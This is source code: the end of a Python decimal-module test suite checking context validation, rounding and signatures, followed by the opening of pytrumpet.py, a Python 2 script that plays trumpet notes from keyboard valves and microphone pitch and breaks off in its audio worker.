self.assertRaises(TypeError, setattr, c, attr, [1,2,3])
if HAVE_CONFIG_64:
self.assertRaises(ValueError, setattr, c, attr, 2**32)
self.assertRaises(ValueError, setattr, c, attr, 2**32+1)
# Invalid local context
self.assertRaises(TypeError, exec, 'with localcontext("xyz"): pass',
locals())
self.assertRaises(TypeError, exec,
'with localcontext(context=getcontext()): pass',
locals())
# setcontext
saved_context = getcontext()
self.assertRaises(TypeError, setcontext, "xyz")
setcontext(saved_context)
def test_rounding_strings_interned(self):
self.assertIs(C.ROUND_UP, P.ROUND_UP)
self.assertIs(C.ROUND_DOWN, P.ROUND_DOWN)
self.assertIs(C.ROUND_CEILING, P.ROUND_CEILING)
self.assertIs(C.ROUND_FLOOR, P.ROUND_FLOOR)
self.assertIs(C.ROUND_HALF_UP, P.ROUND_HALF_UP)
self.assertIs(C.ROUND_HALF_DOWN, P.ROUND_HALF_DOWN)
self.assertIs(C.ROUND_HALF_EVEN, P.ROUND_HALF_EVEN)
self.assertIs(C.ROUND_05UP, P.ROUND_05UP)
@requires_extra_functionality
def test_c_context_errors_extra(self):
Context = C.Context
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
localcontext = C.localcontext
getcontext = C.getcontext
setcontext = C.setcontext
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
c = Context()
# Input corner cases
int_max = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
# OverflowError, general ValueError
self.assertRaises(OverflowError, setattr, c, '_allcr', int_max+1)
self.assertRaises(OverflowError, setattr, c, '_allcr', -int_max-2)
if sys.platform != 'win32':
self.assertRaises(ValueError, setattr, c, '_allcr', int_max)
self.assertRaises(ValueError, setattr, c, '_allcr', -int_max-1)
# OverflowError, general TypeError
for attr in ('_flags', '_traps'):
self.assertRaises(OverflowError, setattr, c, attr, int_max+1)
self.assertRaises(OverflowError, setattr, c, attr, -int_max-2)
if sys.platform != 'win32':
self.assertRaises(TypeError, setattr, c, attr, int_max)
self.assertRaises(TypeError, setattr, c, attr, -int_max-1)
# _allcr
self.assertRaises(ValueError, setattr, c, '_allcr', -1)
self.assertRaises(ValueError, setattr, c, '_allcr', 2)
self.assertRaises(TypeError, setattr, c, '_allcr', [1,2,3])
if HAVE_CONFIG_64:
self.assertRaises(ValueError, setattr, c, '_allcr', 2**32)
self.assertRaises(ValueError, setattr, c, '_allcr', 2**32+1)
# _flags, _traps
for attr in ['_flags', '_traps']:
self.assertRaises(TypeError, setattr, c, attr, 999999)
self.assertRaises(TypeError, setattr, c, attr, 'x')
def test_c_valid_context(self):
# These tests are for code coverage in _decimal.
DefaultContext = C.DefaultContext
Clamped = C.Clamped
Underflow = C.Underflow
Inexact = C.Inexact
Rounded = C.Rounded
Subnormal = C.Subnormal
c = DefaultContext.copy()
# Exercise all getters and setters
c.prec = 34
c.rounding = ROUND_HALF_UP
c.Emax = 3000
c.Emin = -3000
c.capitals = 1
c.clamp = 0
self.assertEqual(c.prec, 34)
self.assertEqual(c.rounding, ROUND_HALF_UP)
self.assertEqual(c.Emin, -3000)
self.assertEqual(c.Emax, 3000)
self.assertEqual(c.capitals, 1)
self.assertEqual(c.clamp, 0)
self.assertEqual(c.Etiny(), -3033)
self.assertEqual(c.Etop(), 2967)
# Exercise all unsafe setters
if C.MAX_PREC == 425000000:
c._unsafe_setprec(999999999)
c._unsafe_setemax(999999999)
c._unsafe_setemin(-999999999)
self.assertEqual(c.prec, 999999999)
self.assertEqual(c.Emax, 999999999)
self.assertEqual(c.Emin, -999999999)
@requires_extra_functionality
def test_c_valid_context_extra(self):
DefaultContext = C.DefaultContext
c = DefaultContext.copy()
self.assertEqual(c._allcr, 1)
c._allcr = 0
self.assertEqual(c._allcr, 0)
def test_c_round(self):
# Restricted input.
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
localcontext = C.localcontext
MAX_EMAX = C.MAX_EMAX
MIN_ETINY = C.MIN_ETINY
int_max = 2**63-1 if C.MAX_PREC > 425000000 else 2**31-1
with localcontext() as c:
c.traps[InvalidOperation] = True
self.assertRaises(InvalidOperation, Decimal("1.23").__round__,
-int_max-1)
self.assertRaises(InvalidOperation, Decimal("1.23").__round__,
int_max)
self.assertRaises(InvalidOperation, Decimal("1").__round__,
int(MAX_EMAX+1))
self.assertRaises(C.InvalidOperation, Decimal("1").__round__,
-int(MIN_ETINY-1))
self.assertRaises(OverflowError, Decimal("1.23").__round__,
-int_max-2)
self.assertRaises(OverflowError, Decimal("1.23").__round__,
int_max+1)
def test_c_format(self):
# Restricted input
Decimal = C.Decimal
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
self.assertRaises(TypeError, Decimal(1).__format__, "=10.10", [], 9)
self.assertRaises(TypeError, Decimal(1).__format__, "=10.10", 9)
self.assertRaises(TypeError, Decimal(1).__format__, [])
self.assertRaises(ValueError, Decimal(1).__format__, "<>=10.10")
maxsize = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
self.assertRaises(ValueError, Decimal("1.23456789").__format__,
"=%d.1" % maxsize)
def test_c_integral(self):
Decimal = C.Decimal
Inexact = C.Inexact
localcontext = C.localcontext
x = Decimal(10)
self.assertEqual(x.to_integral(), 10)
self.assertRaises(TypeError, x.to_integral, '10')
self.assertRaises(TypeError, x.to_integral, 10, 'x')
self.assertRaises(TypeError, x.to_integral, 10)
self.assertEqual(x.to_integral_value(), 10)
self.assertRaises(TypeError, x.to_integral_value, '10')
self.assertRaises(TypeError, x.to_integral_value, 10, 'x')
self.assertRaises(TypeError, x.to_integral_value, 10)
self.assertEqual(x.to_integral_exact(), 10)
self.assertRaises(TypeError, x.to_integral_exact, '10')
self.assertRaises(TypeError, x.to_integral_exact, 10, 'x')
self.assertRaises(TypeError, x.to_integral_exact, 10)
with localcontext() as c:
x = Decimal("99999999999999999999999999.9").to_integral_value(ROUND_UP)
self.assertEqual(x, Decimal('100000000000000000000000000'))
x = Decimal("99999999999999999999999999.9").to_integral_exact(ROUND_UP)
self.assertEqual(x, Decimal('100000000000000000000000000'))
c.traps[Inexact] = True
self.assertRaises(Inexact, Decimal("999.9").to_integral_exact, ROUND_UP)
def test_c_funcs(self):
# Invalid arguments
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
DivisionByZero = C.DivisionByZero
getcontext = C.getcontext
localcontext = C.localcontext
self.assertEqual(Decimal('9.99e10').to_eng_string(), '99.9E+9')
self.assertRaises(TypeError, pow, Decimal(1), 2, "3")
self.assertRaises(TypeError, Decimal(9).number_class, "x", "y")
self.assertRaises(TypeError, Decimal(9).same_quantum, 3, "x", "y")
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), []
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), getcontext()
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), 10
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), ROUND_UP, 1000
)
with localcontext() as c:
c.clear_traps()
# Invalid arguments
self.assertRaises(TypeError, c.copy_sign, Decimal(1), "x", "y")
self.assertRaises(TypeError, c.canonical, 200)
self.assertRaises(TypeError, c.is_canonical, 200)
self.assertRaises(TypeError, c.divmod, 9, 8, "x", "y")
self.assertRaises(TypeError, c.same_quantum, 9, 3, "x", "y")
self.assertEqual(str(c.canonical(Decimal(200))), '200')
self.assertEqual(c.radix(), 10)
c.traps[DivisionByZero] = True
self.assertRaises(DivisionByZero, Decimal(9).__divmod__, 0)
self.assertRaises(DivisionByZero, c.divmod, 9, 0)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
c.traps[InvalidOperation] = True
self.assertRaises(InvalidOperation, Decimal(9).__divmod__, 0)
self.assertRaises(InvalidOperation, c.divmod, 9, 0)
self.assertTrue(c.flags[DivisionByZero])
c.traps[InvalidOperation] = True
c.prec = 2
self.assertRaises(InvalidOperation, pow, Decimal(1000), 1, 501)
def test_va_args_exceptions(self):
Decimal = C.Decimal
Context = C.Context
x = Decimal("10001111111")
for attr in ['exp', 'is_normal', 'is_subnormal', 'ln', 'log10',
'logb', 'logical_invert', 'next_minus', 'next_plus',
'normalize', 'number_class', 'sqrt', 'to_eng_string']:
func = getattr(x, attr)
self.assertRaises(TypeError, func, context="x")
self.assertRaises(TypeError, func, "x", context=None)
for attr in ['compare', 'compare_signal', 'logical_and',
'logical_or', 'max', 'max_mag', 'min', 'min_mag',
'remainder_near', 'rotate', 'scaleb', 'shift']:
func = getattr(x, attr)
self.assertRaises(TypeError, func, context="x")
self.assertRaises(TypeError, func, "x", context=None)
self.assertRaises(TypeError, x.to_integral, rounding=None, context=[])
self.assertRaises(TypeError, x.to_integral, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral, [], [])
self.assertRaises(TypeError, x.to_integral_value, rounding=None, context=[])
self.assertRaises(TypeError, x.to_integral_value, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral_value, [], [])
self.assertRaises(TypeError, x.to_integral_exact, rounding=None, context=[])
self.assertRaises(TypeError, x.to_integral_exact, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral_exact, [], [])
self.assertRaises(TypeError, x.fma, 1, 2, context="x")
self.assertRaises(TypeError, x.fma, 1, 2, "x", context=None)
self.assertRaises(TypeError, x.quantize, 1, [], context=None)
self.assertRaises(TypeError, x.quantize, 1, [], rounding=None)
self.assertRaises(TypeError, x.quantize, 1, [], [])
c = Context()
self.assertRaises(TypeError, c.power, 1, 2, mod="x")
self.assertRaises(TypeError, c.power, 1, "x", mod=None)
self.assertRaises(TypeError, c.power, "x", 2, mod=None)
@requires_extra_functionality
def test_c_context_templates(self):
self.assertEqual(
C.BasicContext._traps,
C.DecIEEEInvalidOperation|C.DecDivisionByZero|C.DecOverflow|
C.DecUnderflow|C.DecClamped
)
self.assertEqual(
C.DefaultContext._traps,
C.DecIEEEInvalidOperation|C.DecDivisionByZero|C.DecOverflow
)
@requires_extra_functionality
def test_c_signal_dict(self):
# SignalDict coverage
Context = C.Context
DefaultContext = C.DefaultContext
InvalidOperation = C.InvalidOperation
DivisionByZero = C.DivisionByZero
Overflow = C.Overflow
Subnormal = C.Subnormal
Underflow = C.Underflow
Rounded = C.Rounded
Inexact = C.Inexact
Clamped = C.Clamped
DecClamped = C.DecClamped
DecInvalidOperation = C.DecInvalidOperation
DecIEEEInvalidOperation = C.DecIEEEInvalidOperation
def assertIsExclusivelySet(signal, signal_dict):
for sig in signal_dict:
if sig == signal:
self.assertTrue(signal_dict[sig])
else:
self.assertFalse(signal_dict[sig])
c = DefaultContext.copy()
# Signal dict methods
self.assertTrue(Overflow in c.traps)
c.clear_traps()
for k in c.traps.keys():
c.traps[k] = True
for v in c.traps.values():
self.assertTrue(v)
c.clear_traps()
for k, v in c.traps.items():
self.assertFalse(v)
self.assertFalse(c.flags.get(Overflow))
self.assertIs(c.flags.get("x"), None)
self.assertEqual(c.flags.get("x", "y"), "y")
self.assertRaises(TypeError, c.flags.get, "x", "y", "z")
self.assertEqual(len(c.flags), len(c.traps))
s = sys.getsizeof(c.flags)
s = sys.getsizeof(c.traps)
s = c.flags.__repr__()
# Set flags/traps.
c.clear_flags()
c._flags = DecClamped
self.assertTrue(c.flags[Clamped])
c.clear_traps()
c._traps = DecInvalidOperation
self.assertTrue(c.traps[InvalidOperation])
# Set flags/traps from dictionary.
c.clear_flags()
d = c.flags.copy()
d[DivisionByZero] = True
c.flags = d
assertIsExclusivelySet(DivisionByZero, c.flags)
c.clear_traps()
d = c.traps.copy()
d[Underflow] = True
c.traps = d
assertIsExclusivelySet(Underflow, c.traps)
# Random constructors
IntSignals = {
Clamped: C.DecClamped,
Rounded: C.DecRounded,
Inexact: C.DecInexact,
Subnormal: C.DecSubnormal,
Underflow: C.DecUnderflow,
Overflow: C.DecOverflow,
DivisionByZero: C.DecDivisionByZero,
InvalidOperation: C.DecIEEEInvalidOperation
}
IntCond = [
C.DecDivisionImpossible, C.DecDivisionUndefined, C.DecFpuError,
C.DecInvalidContext, C.DecInvalidOperation, C.DecMallocError,
C.DecConversionSyntax,
]
lim = len(OrderedSignals[C])
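        # Exercise the Context constructor with every sample size of random
        # flags/traps (0..lim-1) under every rounding mode, then check that the
        # public attributes and the private _flags/_traps bitfields agree.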
for r in range(lim):
for t in range(lim):
for round in RoundingModes:
flags = random.sample(OrderedSignals[C], r)
traps = random.sample(OrderedSignals[C], t)
prec = random.randrange(1, 10000)
emin = random.randrange(-10000, 0)
emax = random.randrange(0, 10000)
clamp = random.randrange(0, 2)
caps = random.randrange(0, 2)
cr = random.randrange(0, 2)
c = Context(prec=prec, rounding=round, Emin=emin, Emax=emax,
capitals=caps, clamp=clamp, flags=list(flags),
traps=list(traps))
self.assertEqual(c.prec, prec)
self.assertEqual(c.rounding, round)
self.assertEqual(c.Emin, emin)
self.assertEqual(c.Emax, emax)
self.assertEqual(c.capitals, caps)
self.assertEqual(c.clamp, clamp)
f = 0
for x in flags:
f |= IntSignals[x]
self.assertEqual(c._flags, f)
f = 0
for x in traps:
f |= IntSignals[x]
self.assertEqual(c._traps, f)
for cond in IntCond:
c._flags = cond
self.assertTrue(c._flags&DecIEEEInvalidOperation)
assertIsExclusivelySet(InvalidOperation, c.flags)
for cond in IntCond:
c._traps = cond
self.assertTrue(c._traps&DecIEEEInvalidOperation)
assertIsExclusivelySet(InvalidOperation, c.traps)
def test_invalid_override(self):
Decimal = C.Decimal
try:
from locale import CHAR_MAX
except ImportError:
self.skipTest('locale.CHAR_MAX not available')
def make_grouping(lst):
return ''.join([chr(x) for x in lst])
def get_fmt(x, override=None, fmt='n'):
return Decimal(x).__format__(fmt, override)
invalid_grouping = {
'decimal_point' : ',',
'grouping' : make_grouping([255, 255, 0]),
'thousands_sep' : ','
}
invalid_dot = {
'decimal_point' : 'xxxxx',
'grouping' : make_grouping([3, 3, 0]),
'thousands_sep' : ','
}
invalid_sep = {
'decimal_point' : '.',
'grouping' : make_grouping([3, 3, 0]),
'thousands_sep' : 'yyyyy'
}
if CHAR_MAX == 127: # negative grouping in override
self.assertRaises(ValueError, get_fmt, 12345,
invalid_grouping, 'g')
self.assertRaises(ValueError, get_fmt, 12345, invalid_dot, 'g')
self.assertRaises(ValueError, get_fmt, 12345, invalid_sep, 'g')
def test_exact_conversion(self):
Decimal = C.Decimal
localcontext = C.localcontext
InvalidOperation = C.InvalidOperation
with localcontext() as c:
c.traps[InvalidOperation] = True
# Clamped
x = "0e%d" % sys.maxsize
self.assertRaises(InvalidOperation, Decimal, x)
x = "0e%d" % (-sys.maxsize-1)
self.assertRaises(InvalidOperation, Decimal, x)
# Overflow
x = "1e%d" % sys.maxsize
self.assertRaises(InvalidOperation, Decimal, x)
# Underflow
x = "1e%d" % (-sys.maxsize-1)
self.assertRaises(InvalidOperation, Decimal, x)
def test_from_tuple(self):
Decimal = C.Decimal
localcontext = C.localcontext
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
Underflow = C.Underflow
with localcontext() as c:
c.traps[InvalidOperation] = True
c.traps[Overflow] = True
c.traps[Underflow] = True
# SSIZE_MAX
x = (1, (), sys.maxsize)
self.assertEqual(str(c.create_decimal(x)), '-0E+999999')
self.assertRaises(InvalidOperation, Decimal, x)
x = (1, (0, 1, 2), sys.maxsize)
self.assertRaises(Overflow, c.create_decimal, x)
self.assertRaises(InvalidOperation, Decimal, x)
# SSIZE_MIN
x = (1, (), -sys.maxsize-1)
self.assertEqual(str(c.create_decimal(x)), '-0E-1000007')
self.assertRaises(InvalidOperation, Decimal, x)
x = (1, (0, 1, 2), -sys.maxsize-1)
self.assertRaises(Underflow, c.create_decimal, x)
self.assertRaises(InvalidOperation, Decimal, x)
# OverflowError
x = (1, (), sys.maxsize+1)
self.assertRaises(OverflowError, c.create_decimal, x)
self.assertRaises(OverflowError, Decimal, x)
x = (1, (), -sys.maxsize-2)
self.assertRaises(OverflowError, c.create_decimal, x)
self.assertRaises(OverflowError, Decimal, x)
# Specials
x = (1, (), "N")
self.assertEqual(str(Decimal(x)), '-sNaN')
x = (1, (0,), "N")
self.assertEqual(str(Decimal(x)), '-sNaN')
x = (1, (0, 1), "N")
self.assertEqual(str(Decimal(x)), '-sNaN1')
def test_sizeof(self):
Decimal = C.Decimal
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
self.assertGreater(Decimal(0).__sizeof__(), 0)
if HAVE_CONFIG_64:
x = Decimal(10**(19*24)).__sizeof__()
y = Decimal(10**(19*25)).__sizeof__()
self.assertEqual(y, x+8)
else:
x = Decimal(10**(9*24)).__sizeof__()
y = Decimal(10**(9*25)).__sizeof__()
self.assertEqual(y, x+4)
def test_internal_use_of_overridden_methods(self):
Decimal = C.Decimal
# Unsound subtyping
class X(float):
def as_integer_ratio(self):
return 1
def __abs__(self):
return self
class Y(float):
def __abs__(self):
return [1]*200
class I(int):
def bit_length(self):
return [1]*200
class Z(float):
def as_integer_ratio(self):
return (I(1), I(1))
def __abs__(self):
return self
for cls in X, Y, Z:
self.assertEqual(Decimal.from_float(cls(101.1)),
Decimal.from_float(101.1))
@requires_docstrings
@unittest.skipUnless(C, "test requires C version")
class SignatureTest(unittest.TestCase):
"""Function signatures"""
def test_inspect_module(self):
for attr in dir(P):
if attr.startswith('_'):
continue
p_func = getattr(P, attr)
c_func = getattr(C, attr)
if (attr == 'Decimal' or attr == 'Context' or
inspect.isfunction(p_func)):
p_sig = inspect.signature(p_func)
c_sig = inspect.signature(c_func)
# parameter names:
c_names = list(c_sig.parameters.keys())
p_names = [x for x in p_sig.parameters.keys() if not
x.startswith('_')]
self.assertEqual(c_names, p_names,
msg="parameter name mismatch in %s" % p_func)
c_kind = [x.kind for x in c_sig.parameters.values()]
p_kind = [x[1].kind for x in p_sig.parameters.items() if not
x[0].startswith('_')]
# parameters:
if attr != 'setcontext':
self.assertEqual(c_kind, p_kind,
msg="parameter kind mismatch in %s" % p_func)
def test_inspect_types(self):
POS = inspect._ParameterKind.POSITIONAL_ONLY
POS_KWD = inspect._ParameterKind.POSITIONAL_OR_KEYWORD
# Type heuristic (type annotations would help!):
pdict = {C: {'other': C.Decimal(1),
'third': C.Decimal(1),
'x': C.Decimal(1),
'y': C.Decimal(1),
'z': C.Decimal(1),
'a': C.Decimal(1),
'b': C.Decimal(1),
'c': C.Decimal(1),
'exp': C.Decimal(1),
'modulo': C.Decimal(1),
'num': "1",
'f': 1.0,
'rounding': C.ROUND_HALF_UP,
'context': C.getcontext()},
P: {'other': P.Decimal(1),
'third': P.Decimal(1),
'a': P.Decimal(1),
'b': P.Decimal(1),
'c': P.Decimal(1),
'exp': P.Decimal(1),
'modulo': P.Decimal(1),
'num': "1",
'f': 1.0,
'rounding': P.ROUND_HALF_UP,
'context': P.getcontext()}}
def mkargs(module, sig):
args = []
kwargs = {}
for name, param in sig.parameters.items():
if name == 'self': continue
if param.kind == POS:
args.append(pdict[module][name])
elif param.kind == POS_KWD:
kwargs[name] = pdict[module][name]
else:
raise TestFailed("unexpected parameter kind")
return args, kwargs
def tr(s):
"""The C Context docstrings use 'x' in order to prevent confusion
with the article 'a' in the descriptions."""
if s == 'x': return 'a'
if s == 'y': return 'b'
if s == 'z': return 'c'
return s
def doit(ty):
p_type = getattr(P, ty)
c_type = getattr(C, ty)
for attr in dir(p_type):
if attr.startswith('_'):
continue
p_func = getattr(p_type, attr)
c_func = getattr(c_type, attr)
if inspect.isfunction(p_func):
p_sig = inspect.signature(p_func)
c_sig = inspect.signature(c_func)
# parameter names:
p_names = list(p_sig.parameters.keys())
c_names = [tr(x) for x in c_sig.parameters.keys()]
self.assertEqual(c_names, p_names,
msg="parameter name mismatch in %s" % p_func)
p_kind = [x.kind for x in p_sig.parameters.values()]
c_kind = [x.kind for x in c_sig.parameters.values()]
# 'self' parameter:
self.assertIs(p_kind[0], POS_KWD)
self.assertIs(c_kind[0], POS)
# remaining parameters:
if ty == 'Decimal':
self.assertEqual(c_kind[1:], p_kind[1:],
msg="parameter kind mismatch in %s" % p_func)
else: # Context methods are positional only in the C version.
self.assertEqual(len(c_kind), len(p_kind),
msg="parameter kind mismatch in %s" % p_func)
# Run the function:
args, kwds = mkargs(C, c_sig)
try:
getattr(c_type(9), attr)(*args, **kwds)
except Exception as err:
raise TestFailed("invalid signature for %s: %s %s" % (c_func, args, kwds))
args, kwds = mkargs(P, p_sig)
try:
getattr(p_type(9), attr)(*args, **kwds)
except Exception as err:
raise TestFailed("invalid signature for %s: %s %s" % (p_func, args, kwds))
doit('Decimal')
doit('Context')
all_tests = [
CExplicitConstructionTest, PyExplicitConstructionTest,
CImplicitConstructionTest, PyImplicitConstructionTest,
CFormatTest, PyFormatTest,
CArithmeticOperatorsTest, PyArithmeticOperatorsTest,
CThreadingTest, PyThreadingTest,
CUsabilityTest, PyUsabilityTest,
CPythonAPItests, PyPythonAPItests,
CContextAPItests, PyContextAPItests,
CContextWithStatement, PyContextWithStatement,
CContextFlags, PyContextFlags,
CSpecialContexts, PySpecialContexts,
CContextInputValidation, PyContextInputValidation,
CContextSubclassing, PyContextSubclassing,
CCoverage, PyCoverage,
CFunctionality, PyFunctionality,
CWhitebox, PyWhitebox,
CIBMTestCases, PyIBMTestCases,
]
# Delete C tests if _decimal.so is not present.
if not C:
all_tests = all_tests[1::2]
else:
all_tests.insert(0, CheckAttributes)
all_tests.insert(1, SignatureTest)
def test_main(arith=None, verbose=None, todo_tests=None, debug=None):
""" Execute the tests.
Runs all arithmetic tests if arith is True or if the "decimal" resource
is enabled in regrtest.py
"""
init(C)
init(P)
global TEST_ALL, DEBUG
TEST_ALL = arith if arith is not None else is_resource_enabled('decimal')
DEBUG = debug
if todo_tests is None:
test_classes = all_tests
else:
test_classes = [CIBMTestCases, PyIBMTestCases]
# Dynamically build custom test definition for each file in the test
# directory and add the definitions to the DecimalTest class. This
    # procedure ensures that new files do not get skipped.
for filename in os.listdir(directory):
if '.decTest' not in filename or filename.startswith("."):
continue
head, tail = filename.split('.')
if todo_tests is not None and head not in todo_tests:
continue
tester = lambda self, f=filename: self.eval_file(directory + f)
setattr(CIBMTestCases, 'test_' + head, tester)
setattr(PyIBMTestCases, 'test_' + head, tester)
del filename, head, tail, tester
try:
run_unittest(*test_classes)
if todo_tests is None:
from doctest import IGNORE_EXCEPTION_DETAIL
savedecimal = sys.modules['decimal']
if C:
sys.modules['decimal'] = C
run_doctest(C, verbose, optionflags=IGNORE_EXCEPTION_DETAIL)
sys.modules['decimal'] = P
run_doctest(P, verbose)
sys.modules['decimal'] = savedecimal
finally:
if C: C.setcontext(ORIGINAL_CONTEXT[C])
P.setcontext(ORIGINAL_CONTEXT[P])
if not C:
warnings.warn('C tests skipped: no module named _decimal.',
UserWarning)
    if orig_sys_decimal is not sys.modules['decimal']:
raise TestFailed("Internal error: unbalanced number of changes to "
"sys.modules['decimal'].")
if __name__ == '__main__':
import optparse
p = optparse.OptionParser("test_decimal.py [--debug] [{--skip | test1 [test2 [...]]}]")
p.add_option('--debug', '-d', action='store_true', help='shows the test number and context before each test')
p.add_option('--skip', '-s', action='store_true', help='skip over 90% of the arithmetic tests')
(opt, args) = p.parse_args()
if opt.skip:
test_main(arith=False, verbose=True)
elif args:
test_main(arith=True, verbose=True, todo_tests=args, debug=opt.debug)
else:
test_main(arith=True, verbose=True)
|
pytrumpet.py
|
#!/usr/bin/python
##
# trumpet.py : Play trumpet using your computer through python
#
# trumpet.py allows you to play a sound font by using your keyboard as valves,
# and your microphone to listen to the sound produced by a mouthpiece. Using
# these two features a note is played using Fluidsynth (via mingus) from a
# soundfont.
#
# Developers: Christopher Woodall <chris.j.woodall@gmail.com>
# Date: June 02, 2014
# Version: 0.1
##
# Import multiprocessing library to try to deal with the audio input
from multiprocessing import Value, Process
# Import PyGame to make a nice UI, easily (possibly move to pytkinter?)
import pygame
from pygame.locals import *
# Import mingus to play notes using a soundfont (found in the soundfont folder)
from mingus.containers.Note import Note
from mingus.midi import fluidsynth
# Import portaudio bindings (pyaudio), struct (to unpack), and scipy and numpy
# (fft and signal processing helper functions)
import pyaudio as pa
import numpy as np
import scipy as sp
import scipy.signal
import struct
import sys, argparse, operator
def block2short(block):
"""
Take a binary block produced by pyaudio and turn it into an array of
shorts. Assumes the pyaudio.paInt16 datatype is being used.
"""
    # Each sample is 2 bytes long and block arrives as a binary string (an
    # array of 1-byte characters), so the number of shorts to unpack is the
    # length of the block divided by 2.
sample_len = len(block)/2
fmt = "%dh" % (sample_len) # create the format string for unpacking
return struct.unpack(fmt, block)
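# Illustrative usage (assuming a tiny 4-sample paInt16 buffer):
#   >>> import struct
#   >>> block2short(struct.pack("4h", 0, 100, -100, 32767))
#   (0, 100, -100, 32767)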
class Trumpet(object):
"""
Trumpet class which plays notes and also contains the logic for turning a
pygame keystate array into a valve position, and for determining which
harmonic should be triggered.
    At this time actual slotting is not implemented: as long as a tone within
    a harmonic range is being produced, the note will play in tune. Future
    versions should allow for detuning a note and volume control. (FIXME)
"""
default_freq_ranges = [(163,234),
(234,350),
(350,467),
(467,588),
(588,784)] # FIXME: add remaining ranges and fine-tune
default_note_mapping = [
# 000 , 100 , 010 , 110 , 001 , 101 , 011 , 111
# First Range
['A#-3','G#-3','A-3' ,'G-3' ,'F#-3','F-3' ,'F#-3','E-3'],
# Second Range
['F-4' ,'D#-4','E-4' ,'D-4' ,'B-3' ,'C-4' ,'C#-4','B-3'],
# Third Range
['A#-4','G#-4','A-4' ,'G-4' ,'F-4','F-4' ,'F#-4' ,'E-4'],
# Fourth Range
['D-5' ,'C-5','C#-5' ,'B-4' ,'B-3' ,'C-4' ,'C#-4','B-3'],
# Fifth Range
['F-5' ,'D#-5','E-5' ,'D-5' ,'B-4' ,'C-6' ,'C#-6','B-4'],
]
default_valve_mapping=[K_a, K_s, K_d]
def __init__(self,
soundfont_file,
soundfont_driver="alsa",
valve_mapping=default_valve_mapping,
freq_ranges=default_freq_ranges,
note_mapping=default_note_mapping):
"""
Initialize Trumpet
"""
self.valve_mapping = valve_mapping # Valve to key map
self.freq_ranges = freq_ranges # Freq range to harmonic series
# Note mapping indexed as [freq range index][valve combo (index)]
self.note_mapping = note_mapping
# Initialize Fluidsynth
self.soundfont_file = soundfont_file
self.soundfont_driver = soundfont_driver
fluidsynth.init(soundfont_file, soundfont_driver)
# Keep track of the current note state
self.current_note = ""
self.prev_freq = 0
def play_Note(self, freq, keys, vol=1):
"""
"""
next_note = self.lookup_Note(freq, keys)
if next_note != self.current_note:
if self.current_note:
fluidsynth.stop_Note(Note(self.current_note),1)
print "playing note {0}".format(next_note)
fluidsynth.play_Note(Note(next_note),1)
self.current_note = next_note
def stop_Note(self):
"""
"""
if self.current_note:
fluidsynth.stop_Note(Note(self.current_note),1)
print "stopping note"
self.current_note = ""
def lookup_Note(self, freq, keys):
"""
"""
if ((freq + 20) > self.prev_freq) and ((freq - 20) < self.prev_freq):
            print "Hysteresis"
freq = self.prev_freq
self.prev_freq = freq
return self.note_mapping[self.freq2idx(freq)][self.keys2valve_idx(keys)]
def keys2valve_idx(self, keys):
"""
        Turns a pygame key-state array into an index for indexing into the
        note_mapping array. Uses the entries of keys selected by the
        valve_mapping array.
"""
return reduce(operator.or_, [keys[self.valve_mapping[i]]<<i for i in range(3)])
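        # Worked example (illustrative): with K_a and K_d held and K_s up,
        # keys[K_a]=1, keys[K_s]=0, keys[K_d]=1, so the result is
        # (1<<0) | (0<<1) | (1<<2) = 5, i.e. the '101' column of note_mapping.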
def freq2idx(self, freq):
"""
Convert a frequency input to an index for indexing into the
note_mapping array
TODO: - Make it handle out of range frequencies better.
"""
for idx, freq_range in enumerate(self.freq_ranges):
if (freq >= freq_range[0]) and (freq < freq_range[1]):
return idx
return 0
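        # Worked example (illustrative): freq=300 Hz falls inside the default
        # range (234, 350), so freq2idx returns 1 and the second row of
        # note_mapping is used; anything outside all ranges falls back to 0.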
class TrumpetState(object):
"""
Object which holds shared state of various elements of the trumpet
interface. Most notably the run/error state between processes and
the frequency value.
"""
RUNNING = 1
STOP = 0
def __init__(self):
self.state = Value('i', self.RUNNING)
self.frequency = Value('d', 0)
def get_state(self):
return self.state.value
def write_state(self, new_state):
self.state.value = new_state
return self.state.value
def get_frequency(self):
return self.frequency.value
def write_frequency(self, new_frequency):
self.frequency.value = new_frequency
return self.frequency.value
class TrumpetDisplay(object):
"""
"""
def texts(self, text_str, pos):
"""
"""
font=pygame.font.Font(None,30)
scoretext=font.render(text_str, 1, (255,255,255))
self.screen.blit(scoretext, pos)
def __init__(self, trumpet_state, xy=(400,35)):
"""
"""
self.trumpet_state = trumpet_state
self.trumpet_state.write_state(self.trumpet_state.RUNNING)
self.xy = xy
pygame.init()
self.screen = pygame.display.set_mode(xy)
self.keys = []
self.stop_timer = 0
self.prev_note = ""
def cleanup(self):
"""
"""
pygame.quit()
print "Quitting pygame"
def update_display(self, tpt):
"""
"""
frequency = self.trumpet_state.get_frequency()
        # Look for crucial events and update the state
# exits with state of self.run_state
for event in pygame.event.get():
if event.type == QUIT:
self.trumpet_state.write_state(self.trumpet_state.STOP)
return -1
elif event.type == KEYDOWN:
if event.key == K_ESCAPE:
self.trumpet_state.write_state(self.trumpet_state.STOP)
return -1
keys = pygame.key.get_pressed()
self.screen.fill((0, 0, 0))
try:
if frequency < tpt.freq_ranges[0][0]:
self.texts("Silence", (5,5))
tpt.stop_Note()
else:
tpt.play_Note(frequency, keys)
self.texts("Freq: {0} | Note: {1}".format(
frequency, tpt.current_note),(5,5))
except KeyboardInterrupt:
raise
except:
print "Unexpected error:", sys.exc_info()[0]
raise
pygame.display.update()
def audio_processing_worker(trumpet_state, dev_idx=3, rate=44100):
"""
"""
# Set initialization variables to interface
# with microphone/alsa input channel
__CHUNK__ = 4096
